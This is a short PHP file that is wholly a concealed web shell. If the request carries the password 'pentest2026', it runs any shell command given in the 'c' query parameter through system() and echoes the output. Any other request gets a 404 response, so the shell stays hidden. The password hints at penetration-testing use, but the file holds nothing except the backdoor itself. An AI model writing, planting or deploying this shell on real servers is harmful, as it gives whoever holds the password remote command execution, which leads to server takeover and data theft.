<?php
if (isset($_GET['p']) && $_GET['p'] === 'pentest2026' && isset($_GET['c'])) {
    system($_GET['c'] . ' 2>&1');
} else {
    http_response_code(404);
}
